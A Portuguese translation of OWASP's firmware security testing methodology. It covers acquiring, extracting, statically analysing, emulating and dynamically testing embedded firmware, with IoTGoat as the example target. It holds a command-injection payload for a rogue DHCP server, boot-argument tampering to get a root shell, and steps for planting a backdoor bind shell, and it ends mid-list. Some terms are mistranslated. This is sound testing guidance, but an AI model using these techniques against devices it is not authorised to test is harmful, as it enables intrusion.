owasp fstm

Seja conectado em rede ou independente, o firmware é o centro do controle de qualquer dispositivo incorporado. Como tal, é crucial compreender como o firmware pode ser manipulado para executar funções não autorizadas e potencialmente prejudicar a segurança do ecossistema de suporte. Para começar a realizar testes de segurança e engenharia reversa de firmware, use a metodologia a seguir como orientação ao embarcar em uma avaliação futura. A metodologia é composta por nove etapas adaptadas para permitir que pesquisadores de segurança, desenvolvedores de software, consultores, hobbyistas e profissionais de Segurança da Informação conduzam avaliações de segurança de firmware.

As seções a seguir detalharão cada etapa com exemplos de apoio, quando aplicável. Considere visitar a página do projeto OWASP Internet of Things e o repositório GitHub para obter as atualizações mais recentes da metodologia e os próximos lançamentos do projeto.

Uma máquina virtual Ubuntu pré-configurada (EmbedOS) com ferramentas de teste de firmware usadas neste documento pode ser baixada através do link a seguir. Detalhes sobre as ferramentas do EmbedOS podem ser encontrados no GitHub no seguinte repositório https://github.com/scriptingxss/EmbedOS.

Durante esta fase, colete o máximo de informações possível sobre o alvo para compreender sua composição geral subjacente à tecnologia. Tente reunir o seguinte:

• Arquitetura(s) de CPU suportadas
• Plataforma do sistema operacional
• Configurações do bootloader
• Esquemas de hardware
• Fichas técnicas
• Estimativas de linhas de código (LoC)
• Localização do repositório de código-fonte
• Componentes de terceiros
• Licenças de código aberto (por exemplo, GPL)
• Registros de alterações
• IDs da FCC
• Diagramas de design e fluxo de dados
• Modelos de ameaças
• Relatórios anteriores de testes de penetração
• Tickets de rastreamento de bugs (por exemplo, Jira e plataformas de recompensas de bugs, como BugCrowd ou HackerOne)

As informações listadas acima devem ser coletadas antes do trabalho de campo dos testes de segurança por meio de um questionário ou formulário de admissão. Certifique-se de aproveitar as equipes internas de desenvolvimento de linha de produtos para adquirir dados precisos e atualizados. Entenda os controles de segurança aplicados, bem como os itens do roteiro, os problemas de segurança conhecidos e os riscos mais preocupantes. Se necessário, agende análises aprofundadas de acompanhamento sobre recursos específicos em questão. As avaliações são mais bem-sucedidas em um ambiente colaborativo.

Sempre que possível, adquira dados usando ferramentas e técnicas de inteligência de código aberto (OSINT). Se for usado software de código aberto, baixe o repositório e execute análises estáticas manuais e automatizadas na base de código. Às vezes, projetos de software de código aberto já usam ferramentas gratuitas de análise estática fornecidas por fornecedores que fornecem resultados de varredura, como Coverity Scan e LGTM da Semmle. Por exemplo, as capturas de tela abaixo mostram trechos dos resultados do Coverity Scan do Das U-Boot.

Figura : Verificação de cobertura do U-Boot

Figura : Análise de verificação de cobertura U-Boot

Abaixo estão capturas de tela dos resultados do Dropbear da análise do LGTM.

Figura : Alertas LGTM Dropbear

Figura: Resultados LGTM Dropbear

Com as informações em mãos, um exercício de modelo de ameaça leve deve ser realizado mapeando superfícies de ataque e áreas de impacto que mostram maior valor em caso de comprometimento.

Para começar a revisar o conteúdo do firmware, o arquivo de imagem do firmware deve ser adquirido. Tente obter o conteúdo do firmware usando um ou mais dos seguintes métodos:

• Diretamente da equipe de desenvolvimento, fabricante/fornecedor ou cliente
• Construa do zero usando orientações fornecidas pelo fabricante
• Do site de suporte do fornecedor
• Consultas idiotas do Google direcionadas a extensões de arquivos binários e plataformas de compartilhamento de arquivos, como Dropbox, Box e Google Drive
  • É comum encontrar imagens de firmware através de clientes que carregam conteúdo em fóruns, blogs ou comentam em sites onde contataram o fabricante para solucionar um problema e receberam o firmware por meio de um zip ou flash drive enviado.
• Comunicação do dispositivo man-in-the-middle (MITM) durante atualizações
• * Baixe compilações de locais de armazenamento de provedores de nuvem expostos, como buckets S3 da Amazon Web Services (AWS)
• Extraia diretamente do hardware via UART, JTAG, PICit, etc.
• Detecte a comunicação serial nos componentes de hardware para solicitações do servidor de atualização
• Por meio de um endpoint codificado em aplicativos móveis ou espessos
• Despejando firmware do bootloader (por exemplo, U-boot) para armazenamento flash ou pela rede via tftp
• Remoção do chip flash (ex. SPI) ou MCU da placa para análise offline e extração de dados (ÚLTIMO RECURSO).
  • Você precisará de um programador de chip compatível para armazenamento flash e/ou MCU.

*Observação: certifique-se de seguir as leis e regulamentos locais ao baixar dados de serviços de armazenamento de provedores de nuvem expostos.

Cada um dos métodos listados varia em dificuldade e não deve ser considerado uma lista exaustiva. Selecione o método apropriado de acordo com os objetivos do projeto e as regras de engajamento. Se possível, solicite uma compilação de depuração e uma compilação de versão do firmware para maximizar os casos de uso de cobertura de teste no caso de o código de depuração ou a funcionalidade ser compilada em uma versão.

Uma vez obtida a imagem do firmware, explore aspectos do arquivo para identificar suas características. Use as etapas a seguir para analisar tipos de arquivos de firmware, possíveis metadados do sistema de arquivos raiz e obter compreensão adicional da plataforma para a qual ele foi compilado.

Aproveite utilitários como:

 file <bin>  
strings  
strings -n5 <bin> 
strings -n16 <bin>#longer than 16
strings -tx <bin> #print offsets in hex 
binwalk <bin>  
hexdump -C -n 512 <bin> > hexdump.out  
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple

Se nenhum dos métodos acima fornecer dados úteis, o seguinte é possível:

• Binário pode ser BareMetal
• O binário pode ser para uma plataforma de sistema operacional em tempo real (RTOS) com um sistema de arquivos personalizado
• Binário pode ser criptografado

Se o binário puder ser criptografado, verifique a entropia usando binwalk com o seguinte comando:

$ binwalk -E <bin>

Baixa entropia = provavelmente não será criptografado

Alta entropia = Provavelmente está criptografado (ou compactado de alguma forma).

Ferramentas alternativas também estão disponíveis usando o Binvis online e o aplicativo independente.

• Binvis
  • https://code.google.com/archive/p/binvis/
  • https://binvis.io/#/

Este estágio envolve examinar o firmware e analisar os dados relativos do sistema de arquivos para começar a identificar o maior número possível de possíveis problemas de segurança. Use as etapas a seguir para extrair o conteúdo do firmware para revisão do código não compilado e das configurações do dispositivo usadas nas etapas seguintes. Os métodos de extração automatizados e manuais são mostrados abaixo.

1. Use as seguintes ferramentas e métodos para extrair o conteúdo do sistema de arquivos:

$ binwalk -ev <bin>

Os arquivos serão extraídos para " _binaryname/filesystemtype/ "

Tipos de sistema de arquivos: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs

2a. Às vezes, o binwalk não terá o byte mágico do sistema de arquivos em suas assinaturas. Nesses casos, use binwalk para encontrar o deslocamento do sistema de arquivos e extrair o sistema de arquivos compactado do binário e extrair manualmente o sistema de arquivos de acordo com seu tipo usando as etapas abaixo.

 $ binwalk DIR850L_REVB.bin

DECIMAL HEXADECIMAL DESCRIPTION
----------------------------------------------------------------------------- ---

0 0x0 DLOB firmware header, boot partition: """"dev=/dev/mtdblock/1""""
10380 0x288C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5213748 bytes
1704052 0x1A0074 PackImg section delimiter tag, little endian size: 32256 bytes; big endian size: 8257536 bytes
1704084 0x1A0094 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8256900 bytes, 2688 inodes, blocksize: 131072 bytes, created: 2016-07-12 02:28:41

2b. Execute o seguinte comando dd esculpindo o sistema de arquivos Squashfs.

 $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs 

8257536+0 records in

8257536+0 records out

8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s

Alternativamente, o seguinte comando também pode ser executado.

$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs

2c. Para squashfs (usado no exemplo acima)

$ unsquashfs dir.squashfs

Os arquivos estarão no diretório " squashfs-root " posteriormente.

2d. Arquivos compactados CPIO

$ cpio -ivd --no-absolute-filenames -F <bin>

2f. Para sistemas de arquivos jffs2

$ jefferson rootfsfile.jffs2

2d. Para sistemas de arquivos ubifs com flash NAND

$ ubireader_extract_images -u UBI -s <start_offset> <bin>

$ ubidump.py <bin>

Durante esta etapa, são coletadas pistas para as etapas de análise dinâmica e de tempo de execução. Investigue se o firmware de destino contém o seguinte (não exaustivo):

• Daemons de rede inseguros legados, como telnetd (às vezes fabrica renomeadores de binários para disfarçar)
• Credenciais codificadas (nomes de usuário, senhas, chaves de API, chaves SSH e variantes de backdoor)
• Endpoints de API codificados e detalhes do servidor back-end
• Atualizar a funcionalidade do servidor que pode ser usada como ponto de entrada
• Revise o código não compilado e inicie scripts para execução remota de código
• Extraia binários compilados para serem usados ​​para análise offline com um desmontador para etapas futuras

Analise estaticamente o conteúdo do sistema de arquivos e o código descompilado manualmente ou aproveitando ferramentas de automação, como o firmwalker, que analisam o seguinte:

• etc/shadow e etc/passwd
• liste o diretório etc/ssl
• pesquise arquivos relacionados a SSL, como .pem, .crt, etc.
• procure por arquivos de configuração
• procure por arquivos de script
• procure outros arquivos .bin
• procure palavras-chave como admin, senha, remoto, chaves AWS, etc.
• pesquise servidores web comuns usados ​​em dispositivos IoT
• procure por binários comuns, como ssh, tftp, dropbear, etc.
• procure por funções c banidas
• procure por funções vulneráveis ​​de injeção de comando comum
• pesquise URLs, endereços de e-mail e endereços IP
• e mais…

As subseções a seguir apresentam ferramentas automatizadas de análise de firmware de código aberto.

Execute o firmwalker em seu diretório ~/tools/firmwalker e aponte o firmwalker para o caminho absoluto do diretório raiz do sistema de arquivos extraído. Firmwalker usa informações no diretório "/data/” para analisar regras. Um fork personalizado modificado por Aaron Guzman com verificações adicionais pode ser encontrado no GitHub em https://github.com/scriptingxss/firmwalker. Os exemplos a seguir mostram o uso de firmwalker usado no IoTGoat da OWASP Projetos adicionais de firmware vulnerável estão listados na seção Firmware vulnerável no final do documento.

$ ./firmwalker.sh /home/embedos/firmware/ _IoTGoat-rpi-2.img.extracted/squashfs-root/

Veja a saída do firmwalker abaixo.

Dois arquivos serão gerados, firmwalker.txt e firmwalkerappsec.txt. Esses arquivos de saída devem ser revisados ​​manualmente.

Felizmente, várias ferramentas automatizadas de análise de firmware de código aberto estão disponíveis. Os recursos do FACT incluem o seguinte:

• Identificação de componentes de software, como sistema operacional, arquitetura de CPU e componentes de terceiros, juntamente com suas informações de versão associadas

• Extração de sistema(s) de arquivos de firmware de imagens

• Detecção de certificados e chaves privadas

• Detecção de mapeamento de implementações fracas para Common Weakness Enumeration (CWE)

• Detecção de vulnerabilidades baseada em feed e assinatura

• Análise comportamental estática básica

• Comparação (diff) de versões e arquivos de firmware

• Emulação de modo de usuário de binários de sistema de arquivos usando QEMU

• Detecção de mitigações binárias como NX, DEP, ASLR, stack canaries, RELRO e FORTIFY_SOURCE

• API REST

• e mais...

  Abaixo estão instruções para usar o kit de ferramentas de comparação de análise de firmware na máquina virtual pré-configurada complementar.

Dica: Recomenda-se executar o FACT com um computador com 16 núcleos e 64 GB de RAM, embora a ferramenta possa ser executada com um mínimo de 4 núcleos e 8 GB de RAM em um ritmo muito mais lento. Os resultados da saída da verificação variam de acordo com os recursos alocados fornecidos à máquina virtual. Quanto mais recursos, mais rápido o FACT concluirá os envios de digitalização.

 $ cd ~/tools/FACT_core/
$ sudo ./start_all_installed_fact_components

Navegue para http://127.0.0.1:5000 no navegador

Figura : Painel FACT

Carregue os componentes do firmware no FACT para análise. Na captura de tela abaixo, o firmware completo compactado com seu sistema de arquivos raiz será carregado e analisado.

Figura: Carregamento de FACT

Dependendo dos recursos de hardware fornecidos ao FACT, os resultados da análise aparecerão com os resultados da varredura em um determinado momento. Este processo pode levar horas se recursos mínimos forem alocados.

Figura: FACT IoTGoat

Figura: Resultados da mitigação de exploração do FACT IoTGoat

Desmonte binários alvo suspeitos com dados coletados do FACT usando IDA Pro, Ghidra, Hopper, Capstone ou Binary Ninja. Analise binários em busca de possíveis chamadas de sistema de execução remota de código, strings, listas de funções, vulnerabilidades de corrupção de memória e identifique Xrefs para system() ou chamadas de função semelhantes. Observe possíveis vulnerabilidades a serem usadas nas próximas etapas.

A captura de tela a seguir mostra o binário “shellback” desmontado usando Ghidra.

Figura: Análise Shellback Ghidra

A análise binária comum consiste em revisar o seguinte:

• Canários de pilha ativados ou desativados
  • $ readelf -aW bin/*| grep stack_chk_fail
  • $ mips-buildroot-linux-uclibc-objdump -d bin/binary | grep stack_chk_fail
• Executável independente de posição (PIE) ativado ou desativado
  • TORTA desativada
    • $ readelf -h <bin> | grep -q 'Type:[[:space:]]*EXEC'
  • TORTA habilitada
    • $ readelf -h <bin> | grep 'Type:[[:space:]]*DYN'
  • DSO
    • $ readelf -d <bin> | grep -q 'DEBUG'
  • Símbolos
    • $ readelf --syms <bin>
    • $ nm <bin>
• Sequências reconhecíveis
  • -el especifica caracteres little-endian com 16 bits de largura (por exemplo, UTF-16).
  • Use -eb para big endian
  • Imprime qualquer string ASCII maior que 16 no stdout
  • O sinalizador -t retornará o deslocamento da string dentro do arquivo.
  • -tx retornará em formato hexadecimal, T-to em octal e -td em decimal.
  • Útil para referência cruzada com um editor hexadecimal ou para saber onde está sua string no arquivo.
  • strings -n5 <bin>
  • strings -el <bin>
  • strings -n16 <bin>
  • strings -tx <bin>
• Não executável (NX) ativado ou desativado
  • $ readelf -lW bin/<bin>| grep STACK

GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

O 'E' indica que a pilha é executável.

 $ execstack bin/*

X bin/ash

X bin/busybox

• Configuração de realocações somente leitura (RELRO)
  • RELRO completo:
    • $ readelf -d binary | grep BIND_NOW
  • RELRO Parcial:
    • $ readelf -d binary | grep GNU_RELRO

Um script que automatiza a verificação de muitas das propriedades binárias acima é checksec.sh. Abaixo, estão dois exemplos de uso do script.

 > ./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/bin/busybox
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH    Symbols        FORTIFY    Fortified    Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No    0        0    /home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/bin/busybox

 > ./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/usr/bin/shellback
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH    Symbols        FORTIFY    Fortified    Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols      No    0        0    /home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/usr/bin/shellback

Figura: Checksec.sh

Para binários da Microsoft (EXE e DLL), use PESecurity para verificar ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard e HighEntropyVA.

EMBA foi projetado como uma ferramenta central de análise de firmware para testadores de penetração. Ele suporta todo o processo de análise de segurança, começando com a extração de firmware , análise estática e análise dinâmica via emulação até a geração de um relatório baseado na web para análise posterior. Iniciado com um único comando, o EMBA descobre automaticamente potenciais pontos fracos e vulnerabilidades no firmware em teste, como binários inseguros, componentes de software antigos e desatualizados, scripts potencialmente vulneráveis ​​ou senhas codificadas.

Os recursos do EMBA incluem o seguinte:

• Extração de firmware através de um ambiente de extração altamente otimizado
• Extração de firmware de sistemas não comuns (por exemplo, firmware QNAP, firmware criptografado D'Link, firmware criptografado EnGenius, arquivos VMDK)
• EMBA não é apenas focado em Linux - também sistemas RTOS como VxWorks podem ser analisados
• Extração e análise automática de contêineres docker
• Identificação de detalhes de firmware, como sistema operacional, arquitetura de CPU e componentes de terceiros, juntamente com as informações de versão associadas
• Emulação de modo de usuário de binários do sistema de arquivos usando QEMU para identificar detalhes da versão
• Análise estática de binários do sistema de arquivos para identificar detalhes da versão
• Banco de dados de versões com mais de 600 identificadores de versão
• Identificação de vulnerabilidades conhecidas e CVE's correspondentes
• Identificação de exploits públicos, módulos Metasploit e PoC's
• Detecção de certificados, chaves privadas e hashes de senha
• Detecção de mitigações binárias como NX, DEP, ASLR, stack canaries, RELRO e FORTIFY_SOURCE
• Detecção de funções binárias legadas (por exemplo, strcpy)
• Execução paralela para desempenho máximo
• A imagem docker pré-configurada está disponível e é fácil de instalar
• Relatório HTML interativo para maior detalhamento da análise automatizada
• Ambiente empresarial baseado na Web via EMBArk
• e mais ...

EMBA está usando várias outras ferramentas em segundo plano. Os recursos de sistema necessários dependem muito do firmware que você vai analisar. Normalmente o EMBA funciona perfeitamente no seguinte ambiente:

• VMware executando um Kali Linux atual
• RAM: mínimo de 8 GB-16 GB
• CPU: mínimo de 4-8 núcleos
• Armazenamento: mínimo de 30 GB a 100 GB de espaço livre em disco

Para instalar o ambiente necessário, você deve executar o script de instalação com permissões de root:

sudo ./installer.sh -d

Você deve usar a opção -d com o instalador para executar uma instalação típica. Isso instalará as dependências necessárias (por exemplo, cve-search) no host e fará o download da imagem do Docker EMBA . Recomendamos usá-lo para a instalação inicial.

Após a conclusão do processo de instalação, é possível usar o EMBA para análise de segurança do firmware a partir da linha de comando. Antes de iniciar o EMBA, baixe um firmware de teste como o firmware OWASP IoTGoat. O comando a seguir mostra um comando típico do EMBA :

sudo ./emba.sh -f ~ /IoTGoat-x86.img.gz -l ~ /emba_logs_iotgoat -p ./scan-profiles/default-scan.emba

O comando mostrado configura as seguintes opções básicas:

• -f - Arquivo de firmware
• -l – Diretório para logs
• -p - Perfil de digitalização a ser usado (localizado em ./scan-profiles)

Outras opções estão disponíveis e podem ser visualizadas via ./emba.sh -h

A primeira etapa de cada teste de firmware é uma verificação de integridade da instalação atual:

Após a verificação de integridade ser bem-sucedida, o processo de análise começa com a identificação e extração do firmware configurado:

Durante o teste do firmware, todos os resultados e o status atual são mostrados ao vivo no terminal. Como uma varredura típica será executada no modo threaded ( parâmetro -t ), essa saída será distorcida e não muito fácil de ler. Para uma análise mais aprofundada, recomenda-se usar os arquivos de log baseados em texto gerados no diretório de log e no relatório da web ( parâmetro -W ). Após finalizar a varredura do firmware, o EMBA mostra um resumo dos resultados no terminal:

Outros resultados estão disponíveis no diretório de log e podem ser analisados ​​na linha de comando ou através do navegador:

firefox ~ /emba_logs_iotgoat/html-report/index.html

O relatório HTML gerado é independente e pode ser facilmente compartilhado. Além disso, este relatório é totalmente interativo e é possível acessar todos os detalhes dos testes através do painel de resumo agregado.

Mais detalhes estão disponíveis no repositório git oficial do EMBA .

EMBArk é a interface empresarial baseada na web para o scanner de segurança de firmware EMBA . Ele foi desenvolvido para fornecer o analisador de segurança de firmware EMBA como um serviço em contêiner e para facilitar a acessibilidade ao back-end de varredura de firmware EMBA, independentemente do sistema e do sistema operacional.

Além disso, o EMBArk melhora o fornecimento de dados agregando os vários resultados da digitalização num painel de gestão agregado.

Na página de detalhes de todas as verificações você pode acessar o relatório detalhado de uma verificação de firmware, iniciar testes adicionais e baixar os logs de verificação:

Mais detalhes com os principais resultados de cada teste de firmware estão disponíveis no relatório detalhado:

Mais informações estão disponíveis no repositório git oficial do EMBArk .

Nota: EMBArk está em um estágio inicial de desenvolvimento.

Usando detalhes e pistas identificadas nas etapas anteriores, o firmware e seus binários encapsulados devem ser emulados para verificar possíveis vulnerabilidades. Para realizar a emulação de firmware, existem algumas abordagens listadas abaixo.

1. Emulação parcial (espaço do usuário) - Emulação de binários independentes derivados de um sistema de arquivos extraído de um firmware, como /usr/bin/shellback
2. Emulação completa do sistema – Emulação do firmware completo e configurações de inicialização aproveitando NVRAM falsa.
3. Emulação usando um dispositivo real ou máquina virtual - Às vezes, a emulação parcial ou total pode não funcionar devido a dependências de hardware ou arquitetura. Se a arquitetura e o endianness corresponderem a um dispositivo de propriedade, como uma torta de framboesa, o sistema de arquivos raiz ou binário específico poderá ser transferido para o dispositivo para testes adicionais. Este método também se aplica a máquinas virtuais pré-construídas que usam a mesma arquitetura e endianidade do destino.

Para começar a emular parcialmente os binários, a arquitetura da CPU e o endianness devem ser conhecidos para selecionar o binário de emulação QEMU apropriado nas etapas a seguir.

 $ binwalk -Y <bin> 
$ readelf -h <bin>

el - pequeno endian

eb - big endian

Binwalk pode ser usado para identificar endianness para binários de firmware empacotados (não de binários dentro de firmware extraído) usando o comando abaixo.

 $ binwalk -Y UPG_ipc8120p-w7-M20-hi3516c-20160328_165229.ov

DECIMAL HEXADECIMAL DESCRIPTION

--------------------------------------------------------------------------------

3480 0xD98 ARM executable code, 32-bit, little endian, at least 1154 valid instructions

Depois que a arquitetura e o endianness da CPU forem identificados, localize o binário QEMU apropriado para realizar a emulação parcial (não para emular o firmware completo, mas binários com o firmware extraído).

Normalmente, em:

/usr/local/qemu-arch ou /usr/bin/qemu-arch

Copie o binário QEMU aplicável no sistema de arquivos raiz extraído. O segundo comando mostra a cópia do binário QEMU do braço estático para o sistema de arquivos raiz extraído dentro de um shell ZSH mostrando o caminho absoluto.

 > cp /usr/local/qemu-arch /extractedrootFS/

/home/embedos/firmware/_DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted.extracted/squashfs-root 
> cp /usr/bin/qemu-arm-static .

Execute o binário ARM (ou arch apropriado) para emular usando QEMU e chroot com o seguinte comando:

$ sudo chroot . ./qemu-arch <binarytoemulate>

O exemplo a seguir mostra o Busybox emulado em uma arquitetura x64 típica que uma máquina invasora provavelmente está usando.

 > sudo chroot . ./qemu-arm-static bin/busybox ls
[sudo] password for embedos: 
bin               etc               overlay           rom               sys               var
dev               lib               proc              root              tmp               www
dnsmasq_setup.sh  mnt               qemu-arm-static   sbin              usr

Abaixo está um exemplo de emulação de um serviço que escuta na porta 5515.

 > sudo chroot . ./qemu-arm-static usr/bin/shellback

Além disso, o mesmo serviço pode ser emulado com a estrutura Qiling.

 > ./qltool run --console False -f ~/_IoTGoat-x86.img.extracted/squashfs-root/usr/bin/shellback --rootfs ~/_IoTGoat-x86.img.extracted/squashfs-root

Em outro terminal, verifique se o serviço está escutando localmente e tente conectar-se a ele com o netcat.

 > sudo lsof -i :5515
COMMAND     PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
qemu-arm- 13264 root    3u  IPv4 662221      0t0  TCP *:5515 (LISTEN)
> nc -nv 127.0.0.1 5515
Connection to 127.0.0.1 5515 port [tcp/*] succeeded!
[***]Successfully Connected to IoTGoat's Backdoor[***]

Às vezes, as solicitações são enviadas para o binário CGI pelo servidor HTTP. Simplesmente emulando o binário CGI, é possível analisar o procedimento do processo ou verificar a vulnerabilidade sem configurar um servidor HTTP. O exemplo a seguir emite uma solicitação GET para um binário MIPS CGI.

 ~/DIR850L/squashfs-root/htdocs/web$ ls -l captcha.cgi
lrwxrwxrwx 1 root root     14 Oct 17  2017 captcha.cgi -> /htdocs/cgibin

# fix the broken symbolic link
~/DIR850L/squashfs-root/htdocs/web$ rm captcha.cgi && ln -s ../cgibin captcha.cgi

~/DIR850L/squashfs-root$ sudo chroot . ./qemu-mips-static -E REQUEST_METHOD="GET" -E REQUEST_URI="/captcha.cgi" -E REMOTE_ADDR="192.168.1.1" -E CONTENT_TYPE="text/html" /htdocs/web/captcha.cgi
HTTP/1.1 200 OK
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><captcha>
    <result>FAIL</result><message>NO SESSION</message>
</captcha>

Com o binário alvo emulado, interaja com seu intérprete ou serviço de escuta. Fuzz suas interfaces de aplicação e rede conforme observado na próxima fase.

Quando possível, use ferramentas de automação como firmadyne, kit de ferramentas de análise de firmware ou ARM-X Firmware Emulation Framework para realizar a emulação completa do firmware. Essas ferramentas são essencialmente wrappers para QEMU e outras funções ambientais, como nvram.

• https://github.com/attify/firmware-análise-toolkit
• https://github.com/therealsaumil/armx/
• https://github.com/getCUJO/MIPS-X
• https://github.com/firmadyne/firmadyne
• https://github.com/qilingframework/qiling#qltool

Usando o kit de ferramentas de análise de firmware, basta executar o seguinte comando:

 sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0 

                               __           _
                              / _|         | |
                             | |_    __ _  | |_
                             |  _|  / _` | | __|
                             | |   | (_| | | |_
                             |_|    __,_|  __|

                Welcome to the Firmware Analysis Toolkit - v0.3
    Offensive IoT Exploitation Training http://bit.do/offensiveiotexploitation
                  By Attify - https://attify.com  | @attifyme

[+] Firmware: IoTGoat-rpi-2.img
[+] Extracting the firmware...
[+] Image ID: 1
[+] Identifying architecture...
[+] Architecture: armel
[+] Building QEMU disk image...
[+] Setting up the network connection, please standby...
[+] Network interfaces: [('eth0', '192.168.1.1')]
[...]
Adding route to 192.168.1.1...
Starting firmware emulation... use Ctrl-a + x to exit
[    0.000000] Booting Linux on physical CPU 0x0
[    0.000000] Linux version 4.1.17+ (vagrant@vagrant-ubuntu-trusty-64) (gcc version 5.3.0 (GCC) ) #1 Thu Feb 18 01:05:21 UTC 2016
[    0.000000] CPU: ARMv7 Processor [412fc0f1] revision 1 (ARMv7), cr=10c5387d
[    0.000000] CPU: PIPT / VIPT nonaliasing data cache, PIPT instruction cache

BusyBox v1.28.4 () built-in shell (ash)

                                                           .--,\__         
 ██████╗ ██╗    ██╗ █████╗ ███████╗██████╗                  `-.    a`-.__    
██╔═══██╗██║    ██║██╔══██╗██╔════╝██╔══██╗                   |         ')   
██║   ██║██║ █╗ ██║███████║███████╗██████╔╝                  /  _.-'-,`;    
██║   ██║██║███╗██║██╔══██║╚════██║██╔═══╝                  /     |   { /    
╚██████╔╝╚███╔███╔╝██║  ██║███████║██║                      /     |   { /    
 ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═╝╚══════╝╚═╝            ..-"``~"-'      ;    )     
                                           ╦┌─┐╔╦╗╔═╗┌─┐┌─┐┌┬┐   ;'    `     
                                           ║│ │ ║ ║ ╦│ │├─┤ │   ;'    `      
                                           ╩└─┘ ╩ ╚═╝└─┘┴ ┴ ┴  ;'    `       
 ------------------------------------------------------------ ;'             
 GitHub: https://github.com/OWASP/IoTGoat                                                
 ------------------------------------------------------------   
root@IoTGoat:/#

Nota: Podem ser necessárias modificações nessas ferramentas se o firmware contiver uma compactação incomum, um sistema de arquivos ou uma arquitetura não suportada.

Neste estágio, execute testes dinâmicos enquanto um dispositivo está sendo executado em seu ambiente normal ou emulado. Os objetivos nesta fase podem variar dependendo do projeto e do nível de acesso concedido. Normalmente, isso envolve adulteração de configurações do bootloader, testes de web e API, difusão (serviços de rede e aplicativos), bem como varredura ativa usando vários conjuntos de ferramentas para adquirir acesso elevado (root) e/ou execução de código.

As ferramentas que podem ser úteis são (não exaustivas):

• Suíte Burp
• OWASPZAP
• Commix
• Fuzzers como - American fuzzy loop (AFL)
• Fuzzers de rede e protocolo, como - Mutiny, boofuzz ​​e kitty.
• Nmap
• Ncrack
• Metasploit

Consulte metodologias web padrão do setor, como o Guia de testes da OWASP e o Padrão de verificação de segurança de aplicativos (ASVS).

As áreas específicas a serem revisadas no aplicativo da web de um dispositivo incorporado são as seguintes:

• Páginas de diagnóstico ou solução de problemas para possíveis vulnerabilidades de injeção de comando
• Os esquemas de autenticação e autorização são validados na mesma estrutura em todos os aplicativos do ecossistema, bem como na plataforma do sistema operacional do firmware
• Teste se nomes de usuário e senhas padrão são usados
• Execute travessia de diretório e descoberta de conteúdo em páginas da web para identificar funcionalidades de depuração ou teste
• Avalia a comunicação SOAP/XML e API para validação de entrada e vulnerabilidades de sanitização, como XSS e XXE
• Fuzz parâmetros do aplicativo e observe exceções e rastreamentos de pilha
  • Adapte cargas direcionadas a serviços de aplicativos da Web incorporados para vulnerabilidades comuns de C/C++, como vulnerabilidades de corrupção de memória, falhas de string de formato e estouros de número inteiro.

Dependendo do produto e de suas interfaces de aplicação, os casos de teste serão diferentes.

Ao modificar a inicialização do dispositivo e os gerenciadores de inicialização, como o U-boot, tente o seguinte:

• Tente acessar o shell do interpretador do bootloader pressionando “0”, espaço ou outros “códigos mágicos” identificados durante a inicialização.
• Modifique as configurações para executar um comando shell, como adicionar ' init=/bin/sh ' no final dos argumentos de inicialização
  • #printenv
  • #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3
  • mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 int=/bin/sh
  • #saveenv
  • #boot
• Configure um servidor tftp para carregar imagens pela rede localmente a partir de sua estação de trabalho. Certifique-se de que o dispositivo tenha acesso à rede.
  • #setenv ipaddr 192.168.2.2 #local IP of the device
  • #setenv serverip 192.168.2.1 #tftp server IP
  • #saveenv
  • #reset
  • #ping 192.168.2.1 #check if network access is available
  • #tftp ${loadaddr} uImage-3.6.35 #loadaddr takes two arguments: the address to load the file into and the filename of the image on the TFTP server
• Use ubootwrite.py para escrever a imagem uboot e enviar um firmware modificado para obter root
• Verifique se há recursos de depuração habilitados, como:
  • registro detalhado
  • carregando kernels arbitrários
  • inicializando de fontes não confiáveis
• *Tenha cuidado: conecte um pino ao terra, observe a sequência de inicialização do dispositivo, antes que o kernel seja descompactado, coloque em curto/conecte o pino aterrado a um pino de dados (DO) em um chip flash SPI
• *Tenha cuidado: Conecte um pino ao terra, observe a sequência de inicialização do dispositivo, antes que o kernel seja descompactado, coloque em curto/conecte o pino aterrado aos pinos 8 e 9 do chip flash NAND no momento em que o U-boot descompacta a imagem UBI
  • *Revise a folha de dados do chip flash NAND antes de colocar os pinos em curto
• Configure um servidor DHCP não autorizado com parâmetros maliciosos como entrada para um dispositivo ingerir durante uma inicialização PXE
  • Use o servidor auxiliar DHCP do Metasploit (MSF) e modifique o parâmetro ' FILENAME ' com comandos de injeção de comando como 'a";/bin/sh;#' para testar a validação de entrada para procedimentos de inicialização do dispositivo.

*Testes de segurança de hardware

Tente fazer upload de firmware personalizado e/ou binários compilados para detectar falhas de integridade ou verificação de assinatura. Por exemplo, compile um shell de ligação backdoor que inicia na inicialização usando as etapas a seguir.

1. Extraia o firmware com firmware-mod-kit (FMK)
2. Identifique a arquitetura e o endianness do firmware de destino
3. Crie um compilador cruzado com Buildroot ou use outros métodos adequados ao seu ambiente
4. Use o compilador cruzado para construir o backdoor
5. Copie o backdoor para o firmware extraído /usr/bin
6. Copie o binário QEMU apropriado para rootfs de firmware extraídos
